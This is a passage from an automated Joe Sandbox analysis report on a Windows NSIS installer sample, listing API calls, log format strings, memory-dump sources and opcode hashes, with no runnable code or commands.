                                                                                                                                                                                                                                                                                        • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                                                                                                                                        • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                                                                                                                                                                                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      • Exec: success ("%s"), xrefs: 00402263
                                                                                                                                                                                                                                                                                      • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                                                                                                                                                                                                                      • Exec: command="%s", xrefs: 00402241
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                                      • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                                                                                                                                                                                                                      • API String ID: 2014279497-3433828417
                                                                                                                                                                                                                                                                                      • Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                                                                                                                                                                      • Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                                                                                                                                                                                                                                                                      • GetMessagePos.USER32 ref: 0040489D
                                                                                                                                                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 004048B5
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                                                                                      • String ID: f
                                                                                                                                                                                                                                                                                      • API String ID: 41195575-1993550816
                                                                                                                                                                                                                                                                                      • Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                                                                                                                                                                      • Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                                                                                                                                                                                                                      • MulDiv.KERNEL32(0005EC00,00000064,00124D0E), ref: 00403295
                                                                                                                                                                                                                                                                                      • wsprintfW.USER32 ref: 004032A5
                                                                                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                                                                                                                                                                                                                      • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      • verifying installer: %d%%, xrefs: 0040329F
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
Similarity
• API ID: Text$ItemTimerWindowwsprintf
• String ID: verifying installer: %d%%
• API String ID: 1451636040-82062127
• Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
• Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
• Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
• Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58
APIs
• CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
• CharNextW.USER32(?,?,?,00000000), ref: 004060D6
• CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
• CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
Strings
Memory Dump Source
• Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
Similarity
• API ID: Char$Next$Prev
• String ID: *?|<>/":
• API String ID: 589700163-165019052
• Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
• Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
• Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
• Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD
APIs
  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
• GlobalFree.KERNEL32(008580D0), ref: 00402387
Strings
Memory Dump Source
• Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
Similarity
• API ID: FreeGloballstrcpyn
• String ID: Exch: stack < %d elements$KsUtilizeBuildings$Pop: stack empty
• API String ID: 1459762280-1353808379
• Opcode ID: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
• Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
• Opcode Fuzzy Hash: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
• Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D
APIs
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
• RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
• RegCloseKey.ADVAPI32(?), ref: 00401504
• RegCloseKey.ADVAPI32(?), ref: 00401529
• RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
Memory Dump Source
• Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
Similarity
• API ID: Close$DeleteEnumOpen
• String ID:
• API String ID: 1912718029-0
• Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
• Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
• Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
• Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                                                                                                                                                                                                                      • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                                                                                                                                                                                                                      • VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
                                                                                                                                                                                                                                                                                        • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(008580D0), ref: 00402387
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3376005127-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                                                                                                                                                                      • Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2568930968-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                                                                                                                                                      • Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?), ref: 004020A3
                                                                                                                                                                                                                                                                                      • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                                                                                                                                                                                                                      • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1849352358-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                                                                                                                                                      • Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessageSend$Timeout
                                                                                                                                                                                                                                                                                      • String ID: !
                                                                                                                                                                                                                                                                                      • API String ID: 1777923405-2657877971
                                                                                                                                                                                                                                                                                      • Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                                                                                                                                      • Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
                                                                                                                                                                                                                                                                                      • wsprintfW.USER32 ref: 00404483
                                                                                                                                                                                                                                                                                      • SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                                                                                                      • String ID: %u.%u%s%s
                                                                                                                                                                                                                                                                                      • API String ID: 3540041739-3551169577
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                                                                                                                                                                                                                      • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                                                                                                                                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                                                                                                                                                                                                                      • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                                                                                                                                                                                                                      • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                                                                                                                                                                                                                      • API String ID: 1697273262-1764544995
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                        • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                                                                                                                                        • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                                                                                                                                      • lstrlenW.KERNEL32 ref: 004026B4
                                                                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                                                                                                                                                                                                                      • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                                                                                                                                                                                                                      • String ID: CopyFiles "%s"->"%s"
                                                                                                                                                                                                                                                                                      • API String ID: 2577523808-3778932970
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: lstrcatwsprintf
                                                                                                                                                                                                                                                                                      • String ID: %02x%c$...
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • OleInitialize.OLE32(00000000), ref: 00405083
                                                                                                                                                                                                                                                                                        • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                                      • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                                                                                                                                                                                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                                                                                                                                                                                                                      • String ID: Section: "%s"$Skipping section: "%s"
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetDC.USER32(?), ref: 00402100
                                                                                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                                                                                                                                                                                                                      • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                                                                                                                                                                                                                        • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,004279E0,759223A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                      • CreateFontIndirectW.GDI32(00420110), ref: 0040216A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      APIs
